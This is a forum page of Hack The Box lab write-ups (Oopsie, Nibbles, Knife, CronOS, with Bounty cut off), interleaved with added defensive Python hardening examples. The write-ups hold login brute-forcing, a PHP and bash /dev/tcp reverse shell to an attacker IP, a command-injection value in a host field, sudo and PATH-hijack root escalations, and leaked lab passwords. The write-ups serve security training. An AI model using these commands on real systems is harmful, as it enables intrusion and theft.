Welcome to Hacking.BG!

Every one of us stands on the shoulders of the giants who shared their knowledge and experience with us.

This forum is our way of returning the favour to the current and future people in cyber security.

We strive to provide a platform where members can develop their skills, with priority given to ethics, security and privacy!

Showing results for tags 'hackthebox'.

  1. h3xu

    Oopsie

    # Enumeration

    #### nmap

    ```
    # nmap -sV -sC -p- -T4 -oA oopsie opsie.htb                                   130 ⨯
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-15 06:18 EDT
    Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
    SYN Stealth Scan Timing: About 42.25% done; ETC: 06:19 (0:00:12 remaining)
    Nmap scan report for opsie.htb (10.10.10.28)
    Host is up (0.17s latency).
    Not shown: 65533 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)
    |   256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)
    |_  256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)
    80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    |_http-title: Welcome
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    ```

    ## Web Application

    #### Nikto

    ```
    # nikto -h opsie.htb
    - Nikto v2.1.6
    ---------------------------------------------------------------------------
    + Target IP:          10.10.10.28
    + Target Hostname:    opsie.htb
    + Target Port:        80
    + Start Time:         2021-09-15 06:20:43 (GMT-4)
    ---------------------------------------------------------------------------
    + Server: Apache/2.4.29 (Ubuntu)
    + The anti-clickjacking X-Frame-Options header is not present.
    + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
    + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
    + No CGI Directories found (use '-C all' to force check all possible dirs)
    + Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
    + IP address found in the 'location' header. The IP is "127.0.1.1".
    + OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
    + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
    + OSVDB-10944: : CGI Directory found
    + OSVDB-10944: /cdn-cgi/login/: CGI Directory found
    + OSVDB-3233: /icons/README: Apache default file found.
    + 10216 requests: 0 error(s) and 10 item(s) reported on remote host
    + End Time:           2021-09-15 06:36:11 (GMT-4) (928 seconds)
    ---------------------------------------------------------------------------
    + 1 host(s) tested
    ```

    #### Gather Intel

    Found admin email at the bottom of the page: [email protected]

    #### Dirbuster

    Found login page at /cdn-cgi/login/index.php:

    ![[Pasted image 20210915134710.png]]

    #### THC-Hydra

    Bruteforcing the admin email account on the cgi login form:

    ```
    # hydra -l [email protected] -P /usr/share/wordlists/rockyou.txt opsie.htb http-post-form "/cdn-cgi/login/index.php:username=^USER^&password=^PASS^:F=Login"
    ```

    MEGACORP_4dm1n!!

    # Reverse Shell

    We're presented with an authenticated page which contains uploads. However, we cannot reach that page as we are unprivileged:

    ![[Pasted image 20210915163835.png]]

    I access the accounts page and notice an id variable which could be changed to show another user by its id.

    ![[Pasted image 20210915164539.png]]

    I use Intruder to bruteforce the ids by inserting a thousand numbers from 1 to 1000 and found a super user at 30:

    ![[Pasted image 20210915164700.png]]

    I access `http://opsie.htb/cdn-cgi/login/admin.php?content=uploads&action=upload`, then I change the request with the id and username of the super user from within Burp. Then I generate the Burp request within the browser and receive access to the uploads, where I upload a PHP reverse shell. The upload was denied, but I caught the request again, changed the id and the username to the super user again, and the file was uploaded.

    Next, set up netcat:

    ```
    # nc -nvlp 1234
    ```

    and curl the file from /uploads:

    ```
    # curl http://10.10.10.28/uploads/php-reverse-shell.php
    ```

    # Privilege Escalation

    Found robert's credentials in the website's files within login.

    ```
    www-data@oopsie:/var/www/html/cdn-cgi/login$ cat db.php
    <?php
    $conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
    ?>
    ```

    As robert, his group is called bugtrack. I found a file called bugtrack in /usr/bin/ that has setuid set and is owned by root. Checked its strings and found it uses cat. Gonna try to poison the path..

    ![[Pasted image 20210915192101.png]]

    -----------------------------------------

    1. Files with SUID set on.
       1. `find / -user root -perm -4000 2>/dev/null`
    2. Investigate the type of file it is:
       1. `file /usr/bin/bugtracker`
    3. Investigate the contents of the file and try to understand what it does:
       1. `strings /usr/bin/bugtracker`
    4. Open the file to see what it does:
       1. it uses cat to dump contents of file
    5. Create a new file called "cat" in a write-able directory and add to its contents /bin/bash
       1. `echo '/bin/bash' > cat`
    6. Change cat's permissions to 777
       1. `chmod 777 cat`
    7. See what is the current directory where the 'cat' file exists and export it:
       1. `pwd`
       2. `export PATH=/home/robert:$PATH`
    8. Check if the PATH is exported correctly:
       1. `echo $PATH`
    9. Run the vulnerable file:
       1. `/usr/bin/bugtracker`
       2. `whoami`: root
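The root cause in the Oopsie post is a privileged program resolving `cat` through the caller's PATH. Added example (not h3xu's code and not the box's bugtracker binary): a Python sketch of how a privileged helper should resolve and run sub-programs, with the naive PATH lookup beside a hardened one that only searches fixed, root-owned directories and refuses helpers writable by others. The `TRUSTED_DIRS` list and the temp-dir layout in `demo()` are assumptions constructed for the demonstration.

```python
"""Resolve helper binaries for a privileged program without trusting the caller's PATH.

Added example, not from the forum post: the SUID bugtracker in the write-up ran `cat`
by bare name, so whichever `cat` came first in the invoking user's PATH ran as
root. A privileged program should look helpers up only in a fixed list of
root-owned system directories and hand the child a sanitized environment.
The directory layout in demo() is constructed in a temp dir so this runs anywhere.
"""
import os
import shutil
import stat
import subprocess
import tempfile

# Assumed trusted locations; a real deployment pins these at build time.
TRUSTED_DIRS = ("/usr/sbin", "/usr/bin", "/sbin", "/bin")


def resolve_untrusted(name, path_env):
    """What the vulnerable binary effectively did: first match on a caller-controlled PATH."""
    return shutil.which(name, path=path_env)


def resolve_trusted(name, trusted_dirs=TRUSTED_DIRS):
    """Hardened lookup: a regular, non-group/other-writable executable inside a trusted dir."""
    if not name or "/" in name:
        raise ValueError("helper must be a bare program name")
    for d in trusted_dirs:
        candidate = os.path.join(d, name)
        try:
            st = os.stat(candidate)
        except FileNotFoundError:
            continue
        if not stat.S_ISREG(st.st_mode):
            continue
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            # A helper that others can write is itself a root-escalation path; skip it.
            continue
        if os.access(candidate, os.X_OK):
            return candidate
    raise FileNotFoundError(f"{name!r} not found in trusted directories")


def run_helper(name, args, trusted_dirs=TRUSTED_DIRS):
    """Run a helper by absolute path with a minimal environment (no inherited PATH)."""
    exe = resolve_trusted(name, trusted_dirs)
    env = {"PATH": ":".join(trusted_dirs), "LANG": "C"}
    return subprocess.run([exe, *args], env=env, capture_output=True, text=True, check=False)


def demo():
    """Build the PATH-hijack layout from the write-up in a temp dir and compare resolvers.

    Returns (naive_picked_planted_cat, hardened_picked_real_cat).
    """
    with tempfile.TemporaryDirectory() as root:
        trusted = os.path.join(root, "usr", "bin")       # stands in for /usr/bin
        user_dir = os.path.join(root, "home", "robert")  # stands in for /home/robert
        os.makedirs(trusted)
        os.makedirs(user_dir)
        real = os.path.join(trusted, "cat")
        with open(real, "w") as f:
            f.write("#!/bin/sh\necho real-cat\n")
        os.chmod(real, 0o755)
        planted = os.path.join(user_dir, "cat")  # the "cat" the post drops in the home dir
        with open(planted, "w") as f:
            f.write("#!/bin/sh\necho planted\n")
        os.chmod(planted, 0o777)
        hijacked_path = f"{user_dir}:{trusted}"  # i.e. export PATH=/home/robert:$PATH
        naive = resolve_untrusted("cat", hijacked_path)
        hardened = resolve_trusted("cat", (trusted,))
        return naive == planted, hardened == real


if __name__ == "__main__":
    print(demo())
```

The same idea applies to a C SUID binary: call `execv` with an absolute path and a fixed `envp`, or at least `setenv("PATH", ...)` before any `system()`/`popen()` call.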
  2. h3xu

    Nibbles

    # Enumeration

    ## NMAP

    The nmap scan reveals 2 open ports:

    ```
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
    |   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
    |_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
    80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
    | http-methods: 
    |_  Supported Methods: GET HEAD POST OPTIONS
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    |_http-title: Site doesn't have a title (text/html).
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    ```

    ## Let's see what the WebApp is like.

    We're greeted by a ***Hello World!*** message.

    ![[Pasted image 20210409152510.png]]

    The source code of the page reveals a directory:

    ![[Pasted image 20210409152620.png]]

    ## Dirbuster

    Using dirbuster, I have found files within the /nibbleblog/content/private/config.xml directory and was able to enumerate possible users:

    ![[Pasted image 20210409152955.png]]

    I also found a feed.php file, which led me into researching whether it was a possible attack vector. The research led me to this interesting article about feed.php and XSS: [feed injection in web](https://repo.zenk-security.com/Techniques%20d.attaques%20%20.%20%20Failles/EN-Feed%20Injection%20In%20Web%202.0.pdf)

    Anyway.. while it was an interesting find, I did not see how it would apply here. So I continued looking.

    ## Searchsploit

    I was going nowhere until I simply typed:

    ```
    searchsploit nibble
    ---------------------------------------------------------------------------------------------------------------------
     Exploit Title                                                                     |  Path
    ---------------------------------------------------------------------------------------------------------------------
    Nibbleblog 3 - Multiple SQL Injections                                             | php/webapps/35865.txt
    Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit)                              | php/remote/38489.rb
    ---------------------------------------------------------------------------------------------------------------------
    Shellcodes: No Results
    ```

    Ahh, it looks like we have a hit. Let's try metasploit:

    ```
    msf6 > search nibble

    Matching Modules
    ================

       #  Name                                       Disclosure Date  Rank       Check  Description
       -  ----                                       ---------------  ----       -----  -----------
       0  exploit/multi/http/nibbleblog_file_upload  2015-09-01       excellent  Yes    Nibbleblog File Upload Vulnerability

    Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/nibbleblog_file_upload
    ```

    I have used the previously enumerated username:password == admin:nibbles:

    ```
    msf6 exploit(multi/http/nibbleblog_file_upload) > exploit

    [*] Started reverse TCP handler on 10.10.14.6:4444 
    [*] Sending stage (39282 bytes) to 10.10.10.75
    [+] Deleted image.php
    [*] Meterpreter session 2 opened (10.10.14.6:4444 -> 10.10.10.75:32812) at 2021-04-09 08:00:26 -0400
    ```

    In the following lines I am interacting with the shell. Finally I discovered an interesting file with 777 rights.

    ```
    meterpreter > shell
    Process 1587 created.
    Channel 0 created.
    whoami
    nibbler
    python3 -c 'import pty;pty.spawn("/bin/bash")'
    nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ cd /home/nibbler
    <ml/nibbleblog/content/private/plugins/my_image$ cd /home/nibbler
    nibbler@Nibbles:/home/nibbler$ ls
    ls
    personal.zip  user.txt
    nibbler@Nibbles:/home/nibbler$ unzip personal.zip
    unzip personal.zip
    Archive:  personal.zip
       creating: personal/
       creating: personal/stuff/
      inflating: personal/stuff/monitor.sh
    nibbler@Nibbles:/home/nibbler$ cd personal/stuff/
    cd personal/stuff/
    nibbler@Nibbles:/home/nibbler/personal/stuff$ file monitor.sh
    file monitor.sh
    monitor.sh: ASCII text
    nibbler@Nibbles:/home/nibbler/personal/stuff$ ll
    ll
    ll: command not found
    nibbler@Nibbles:/home/nibbler/personal/stuff$ ls -la
    ls -la
    total 12
    drwxr-xr-x 2 nibbler nibbler 4096 Dec 10  2017 .
    drwxr-xr-x 3 nibbler nibbler 4096 Dec 10  2017 ..
    -rwxrwxrwx 1 nibbler nibbler 4015 May  8  2015 monitor.sh
    ```

    Catting the file revealed nothing interesting tho. After some time, I tried:

    ```
    sudo -l
    Matching Defaults entries for nibbler on Nibbles:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

    User nibbler may run the following commands on Nibbles:
        (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
    ```

    AHA! This is our gate to escalating privileges. I have removed the unzipped file and instead uploaded a simple bash script:

    ```
    nibbler@Nibbles:/home/nibbler/personal/stuff$ rm monitor.sh
    rm monitor.sh
    ```

    I could not use any editors on the machine, so I had to create it locally and upload it to the victim.

    ```
    meterpreter > upload monitor.sh
    [*] uploading  : /home/kali/Desktop/monitor.sh -> monitor.sh
    [*] Uploaded -1.00 B of 21.00 B (-4.76%): /home/kali/Desktop/monitor.sh -> monitor.sh
    [*] uploaded   : /home/kali/Desktop/monitor.sh -> monitor.sh
    ```

    I have moved the file to ***/home/nibbler/personal/stuff*** and executed the following commands to gain root:

    ```
    cat monitor.sh
    bash -i
    chmod +x monitor.sh
    sudo /home/nibbler/personal/stuff/monitor.sh
    bash: cannot set terminal process group (1360): Inappropriate ioctl for device
    bash: no job control in this shell
    root@Nibbles:/home/nibbler/personal/stuff# id
    id
    uid=0(root) gid=0(root) groups=0(root)
    ```
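The Nibbles escalation works because a `NOPASSWD` rule points at a script the unprivileged user owns and can rewrite. Added example (not h3xu's code): a small audit that parses `sudo -l` output and checks each target for the conditions that made this rule exploitable, namely non-root ownership, group/world write bits, a location under `/home`, and writable ancestor directories. The `sudo -l` text is constructed from the lines quoted in the post; `make_sample_target()` creates a throwaway file so the checks can be exercised offline.

```python
"""Audit sudo NOPASSWD targets for ownership and writability problems.

Added example, not from the forum post. In the write-up root ran
/home/nibbler/personal/stuff/monitor.sh via sudo although the file was
-rwxrwxrwx and sat under the user's own home, so the user simply replaced it.
parse_sudo_l() pulls the rules out of `sudo -l` text; audit_rule() flags a
target that is not root-owned, is group/world writable, lives under /home,
or has an ancestor directory that a non-root user can write to.
"""
import os
import re
import stat
import tempfile

SUDO_RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<nopasswd>NOPASSWD:)?\s*(?P<cmd>\S.*)$")

# Constructed from the sudo -l lines quoted in the post.
SAMPLE_SUDO_L = r"""Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
"""


def parse_sudo_l(text):
    """Return [(run_as, nopasswd, command)] for the rules listed by `sudo -l`."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = SUDO_RULE_RE.match(line) if in_rules else None
        if m:
            rules.append((m.group("runas"), m.group("nopasswd") is not None, m.group("cmd").strip()))
    return rules


def _others_can_write(st):
    return bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def sudo_target_findings(path, trusted_uid=0):
    """Findings for an existing sudo target and every directory above it."""
    findings = []
    real = os.path.realpath(path)
    st = os.stat(real)
    if st.st_uid != trusted_uid:
        findings.append(f"{real}: owned by uid {st.st_uid}, not uid {trusted_uid}")
    if _others_can_write(st):
        findings.append(f"{real}: group/world writable (mode {stat.S_IMODE(st.st_mode):o})")
    parent = os.path.dirname(real)
    while True:
        pst = os.stat(parent)
        # A writable parent lets its owner rename or replace the target outright;
        # sticky dirs such as /tmp restrict that to the file owner, so skip them.
        if pst.st_uid != trusted_uid:
            findings.append(f"{parent}: directory owned by uid {pst.st_uid}")
        if _others_can_write(pst) and not pst.st_mode & stat.S_ISVTX:
            findings.append(f"{parent}: directory writable by others")
        if parent == os.path.dirname(parent):
            break
        parent = os.path.dirname(parent)
    return findings


def audit_rule(cmd, trusted_uid=0):
    """Audit one sudo command string; the first token is taken as the target path."""
    target = cmd.split()[0]
    findings = []
    if target.startswith("/home/"):
        findings.append(f"{target}: sudo target lives under a user home directory")
    if os.path.exists(target):
        findings.extend(sudo_target_findings(target, trusted_uid))
    else:
        findings.append(f"{target}: path does not exist here (dangling rule)")
    return findings


def make_sample_target(mode=0o777):
    """Create a throwaway script with the given mode so the checks can be exercised offline."""
    d = tempfile.mkdtemp()
    p = os.path.join(d, "monitor.sh")
    with open(p, "w") as f:
        f.write("bash -i\n")
    os.chmod(p, mode)
    return p


if __name__ == "__main__":
    for run_as, nopasswd, cmd in parse_sudo_l(SAMPLE_SUDO_L):
        print(run_as, "NOPASSWD" if nopasswd else "", cmd)
        for finding in audit_rule(cmd):
            print("  -", finding)
```

The fix on the defending side is the same thing the audit measures: sudo targets should be root-owned, mode 0755 or tighter, and placed under a root-owned tree such as `/usr/local/sbin`, never under the invoking user's home.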
  3. h3xu

    Knife

    # Enumeration

    ## nmap

    ```
    # nmap -p- -A -v 10.10.10.242 -oA knife
    <deleted>
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
    |   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
    |_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
    80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
    | http-methods: 
    |_  Supported Methods: GET HEAD POST OPTIONS
    |_http-server-header: Apache/2.4.41 (Ubuntu)
    |_http-title: Emergent Medical Idea
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    ```

    #### Port 80 HTTP

    Additional information leaked from headers:

    ![[Pasted image 20210720125601.png]]

    #### Searchsploit

    Looking at the PHP and Apache versions, I discovered that PHP is vulnerable and there is a python script that spawns a shell.

    ```
    # searchsploit -m php/webapps/49933.py
      Exploit: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
          URL: https://www.exploit-db.com/exploits/49933
         Path: /usr/share/exploitdb/exploits/php/webapps/49933.py
    File Type: HTML document, ASCII text, with CRLF line terminators

    Copied to: /root/49933.py
    ```

    # Exploit

    ```
    # python3 49933.py                                                              1 ⨯
    Enter the full host url:
    http://knife.htb

    Interactive shell is opened on http://knife.htb 
    Can't acces tty; job crontol turned off.
    $ whoami
    james
    $ 
    ```

    # Privilege Escalation

    ```
    $ sudo -l
    Matching Defaults entries for james on knife:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

    User james may run the following commands on knife:
        (root) NOPASSWD: /usr/bin/knife
    $ file /usr/bin/knife
    /usr/bin/knife: symbolic link to /opt/chef-workstation/bin/knife
    $ file /opt/chef-workstation/bin/knife
    /opt/chef-workstation/bin/knife: a /opt/chef-workstation/embedded/bin/ruby --disable-gems script, ASCII text executable
    $ sudo /usr/bin/knife exec --help
    knife exec [SCRIPT] (options)
    -s, --server-url URL             Chef Infra Server URL.
        --chef-zero-host HOST        Host to start Chef Infra Zero on.
        --chef-zero-port PORT        Port (or port range) to start Chef Infra Zero on. Port ranges like 1000,1010 or 8889-9999 will try all given ports until one works.
    -k, --key KEY                    Chef Infra Server API client key.
        --[no-]color                 Use colored output, defaults to enabled.
    -c, --config CONFIG              The configuration file to use.
        --config-option OPTION=VALUE Override a single configuration option.
        --defaults                   Accept default values for all questions.
    -d, --disable-editing            Do not open EDITOR, just accept the data as is.
    -e, --editor EDITOR              Set the editor to use for interactive commands.
        --environment ENVIRONMENT    Set the Chef Infra Client environment (except for in searches, where this will be flagrantly ignored).
    -E, --exec CODE                  A string of Chef Infra Client code to execute.
        --[no-]fips                  Enable FIPS mode.
    -F, --format FORMAT              Which format to use for output. (valid options: 'summary', 'text', 'json', 'yaml', or 'pp')
        --[no-]listen                Whether a local mode (-z) server binds to a port.
    -z, --local-mode                 Point knife commands at local repository instead of Chef Infra Server.
    -u, --user USER                  Chef Infra Server API client username.
        --print-after                Show the data after a destructive operation.
        --profile PROFILE            The credentials profile to select.
    -p, --script-path PATH:PATH      A colon-separated path to look for scripts in.
    -V, --verbose                    More verbose output. Use twice (-VV) for additional verbosity and three times (-VVV) for maximum verbosity.
    -v, --version                    Show Chef Infra Client version.
    -y, --yes                        Say yes to all prompts for confirmation.
    -h, --help                       Show this help message.
    $ sudo knife exec -E 'exec "/bin/sh -i"'
    No input file specified.
    $ exit
    $ ^CExiting...
    ```

    Tried multiple inputs but I am constantly getting *No input file specified.* I think it is because of the exploit. Let's find another one.

    ```
    # wget https://dl.packetstormsecurity.net/2105-exploits/php_8.1.0-dev.py.txt -o php-exploit.py
    # cat php-exploit.py
    <deleted>
    #Usage: python3 php_8.1.0-dev.py -u http://10.10.10.242/ -c ls
    <deleted>
    # python3 php-exploit.py -u http://knife.htb -c id
    [+] Results:
    uid=1000(james) gid=1000(james) groups=1000(james)
    ```

    ```
    # nc -nvlp 1234                                                                 1 ⨯
    listening on [any] 1234 ...
    ```

    ```
    # python3 php-exploit.py -u http://knife.htb -c "/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.7/1234 0>&1'"
    ```

    Now that we have a reverse shell and we can freely interact, we can continue on.

    ```bash
    # nc -nvlp 1234
    listening on [any] 1234 ...
    connect to [10.10.14.7] from (UNKNOWN) [10.10.10.242] 51272
    bash: cannot set terminal process group (944): Inappropriate ioctl for device
    bash: no job control in this shell
    james@knife:/$ 
    james@knife:/$ 
    james@knife:/tmp$ sudo /usr/bin/knife exec -E "exec '/bin/sh -i'"
    sudo /usr/bin/knife exec -E "exec '/bin/sh -i'"
    /bin/sh: 0: can't access tty; job control turned off
    # whoami
    root
    ```

    Pretty good. Enjoy your day! 🙂
  4. h3xu

    CronOS

    # Enumeration

    The enumeration results show 3 open ports:

    ```
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
    53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
    80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    ```

    So, we are dealing with an Ubuntu machine that is hosting a WebApp. Port 53 is also open with an ISC BIND service running. Let's research it a little bit more.

    [ISC Bind 9](https://www.isc.org/bind/) has evolved to be a very flexible, full-featured DNS system. Whatever your application is, BIND 9 probably has the required features. As the first, oldest, and most commonly deployed solution, there are more network engineers who are already familiar with BIND 9 than with any other system.

    I was having problems connecting to the web service so I added the IP to the /etc/hosts file.

    ![[Pasted image 20210413095138.png]]

    # DNS Enumeration

    (link) Check out the video from hackersploit and learn about DNS enumeration and zone transfers to understand the following lines.

    ```
    $ dig axfr @10.10.10.13 cronos.htb

    ; <<>> DiG 9.16.2-Debian <<>> axfr @10.10.10.13 cronos.htb
    ; (1 server found)
    ;; global options: +cmd
    cronos.htb.             604800  IN  SOA  cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
    cronos.htb.             604800  IN  NS   ns1.cronos.htb.
    cronos.htb.             604800  IN  A    10.10.10.13
    admin.cronos.htb.       604800  IN  A    10.10.10.13
    ns1.cronos.htb.         604800  IN  A    10.10.10.13
    www.cronos.htb.         604800  IN  A    10.10.10.13
    cronos.htb.             604800  IN  SOA  cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
    ;; Query time: 28 msec
    ;; SERVER: 10.10.10.13#53(10.10.10.13)
    ;; WHEN: Tue Apr 13 07:09:07 UTC 2021
    ;; XFR size: 7 records (messages 1, bytes 203)
    ```

    I have found a couple of domains linked to cronos. Let's add them to the /etc/hosts file too in order to access them in the browser.

    ![[Pasted image 20210413101836.png]]

    # Admin.cronos.htb & SQLi

    ![[Pasted image 20210413101925.png]]

    A quick SQLi check lets us in.

    ![[Pasted image 20210413102037.png]]

    Two tools are running on the welcome.php page: *Ping* and *traceroute*. From Burp, I have poked the application and discovered command injection.

    ### Request

    ```
    POST /welcome.php HTTP/1.1
    Host: admin.cronos.htb
    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 38
    Origin: http://admin.cronos.htb
    DNT: 1
    Connection: close
    Referer: http://admin.cronos.htb/welcome.php
    Cookie: PHPSESSID=huubsof4d0e5ged45ge0gflp26
    Upgrade-Insecure-Requests: 1
    Sec-GPC: 1

    command=traceroute&host=8.8.8.8%3Bls+.
    ```

    I have encoded a semicolon and added the ls command for the current directory.

    ### Response

    ```
    HTTP/1.1 200 OK
    Date: Tue, 13 Apr 2021 08:01:47 GMT
    Server: Apache/2.4.18 (Ubuntu)
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Vary: Accept-Encoding
    Content-Length: 527
    Connection: close
    Content-Type: text/html; charset=UTF-8

    <html">
    <head>
    <title>Net Tool v0.1 </title>
    </head>
    <body>
    <h1>Net Tool v0.1</h1>
    <form method="POST" action="">
    <select name="command">
    <option value="traceroute">traceroute</option>
    <option value="ping -c 1">ping</option>
    </select>
    <input type="text" name="host" value="8.8.8.8"/>
    <input type="submit" value="Execute!"/>
    </form>
    config.php<br>
    index.php<br>
    logout.php<br>
    session.php<br>
    welcome.php<br>
    <p><a href = "logout.php">Sign Out</a></p>
    </body>
    </html>
    ```
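The request/response pair above shows the whole bug: the decoded `host` value (`8.8.8.8;ls .`) reaches a shell, and the `command` field itself carries command text (`ping -c 1`). Added example (not h3xu's code and not the box's welcome.php, whose source is not in the post): the hardened shape of such a tool in Python, with the raw concatenation reconstructed beside it for contrast. The `COMMANDS` allow-list and the hostname rule are assumptions of the example.

```python
"""Hardened input handling for a ping/traceroute web tool.

Added example, not from the forum post and not the box's welcome.php. The post
shows that `host=8.8.8.8%3Bls+.` made the tool run `ls`, i.e. the decoded host
value reached a shell. The hardened version maps the `command` field onto a
fixed allow-list (the form value becomes a key such as "ping", never command
text), accepts only an IP address or a strict hostname, and builds an argv
list so no shell ever parses user input.
"""
import ipaddress
import re
import subprocess
from urllib.parse import unquote_plus

# Allow-list: form value -> argv prefix. Nothing from the request is ever a program name.
COMMANDS = {
    "traceroute": ["traceroute"],
    "ping": ["ping", "-c", "1"],
}

# RFC 1123-style labels: letters, digits, hyphens; no leading/trailing hyphen; 253 chars max.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def decode_form_value(raw):
    """The decoding a web server applies to application/x-www-form-urlencoded bodies."""
    return unquote_plus(raw)


def vulnerable_command_line(command, host):
    """Reconstructed shape of the bug: raw concatenation handed to a shell (illustrative)."""
    return f"{command} {host}"


def validate_host(host):
    """Return a canonical host string or raise ValueError; shell metacharacters never pass."""
    host = host.strip()
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        pass
    if HOSTNAME_RE.match(host):
        return host
    raise ValueError(f"rejected host value {host!r}")


def build_argv(command, host):
    """Map the form fields onto an argv list; raises ValueError on anything off the allow-list."""
    if command not in COMMANDS:
        raise ValueError(f"unknown command {command!r}")
    return [*COMMANDS[command], validate_host(host)]


def run_tool(command, host, timeout=15):
    """Execute without a shell; the host value is a single argv element."""
    argv = build_argv(command, host)
    return subprocess.run(argv, capture_output=True, text=True, timeout=timeout, check=False)


if __name__ == "__main__":
    injected = decode_form_value("8.8.8.8%3Bls+.")
    print("a shell would have seen:", vulnerable_command_line("traceroute", injected))
    try:
        build_argv("traceroute", injected)
    except ValueError as e:
        print("hardened:", e)
    print("clean request ->", build_argv("ping", "8.8.8.8"))
```

The validation step is a backstop, not the fix: the argv list with `shell=False` is what removes the injection, and the allow-list is what stops the `command` field from being abused the same way.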
  5. h3xu

    Bounty

    # Enumeration

    #### nmap

    We've found two open ports: 22, 80.

    ```
    # nmap -p- -sV -sC -oA bounty 10.10.11.100
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-04 05:02 EDT
    Nmap scan report for 10.10.11.100
    Host is up (0.049s latency).
    Not shown: 65533 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   3072 d4:4c:f5:79:9a:79:a3:b0:f1:66:25:52:c9:53:1f:e1 (RSA)
    |   256 a2:1e:67:61:8d:2f:7a:37:a7:ba:3b:51:08:e8:89:a6 (ECDSA)
    |_  256 a5:75:16:d9:69:58:50:4a:14:11:7a:42:c1:b6:23:44 (ED25519)
    80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
    |_http-server-header: Apache/2.4.41 (Ubuntu)
    |_http-title: Bounty Hunters
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    ```

    # Port 80

    The initial page presents us with a couple of buttons:

    * About

      ![[about us.png]]

    * Contact

      ![[contact us.png]]

      Sending any type of message does not get through as a request; instead it goes to the beginning of the page.

    * Portal

